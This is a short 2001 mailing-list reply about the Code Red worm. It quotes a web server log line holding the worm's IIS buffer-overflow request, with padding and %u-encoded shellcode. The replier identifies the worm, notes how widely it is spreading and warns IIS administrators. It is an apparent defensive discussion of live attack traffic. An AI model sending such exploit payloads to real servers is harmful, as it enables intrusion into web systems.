On Thu, Jul 19, 2001 at 05:17:26PM -0400, Brian Rectanus wrote:
> xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET
> NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
> 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
> 078%u0000%u00=a  HTTP/1.0" 400 328

This is an IIS worm.  It's running wild today...and I do mean wild.  My
server has seen about 10 requests for it today.  It's known as the Code
Red worm.  There some analysis of it at

If you're running IIS, be worried.  Otherwise it's nothing.


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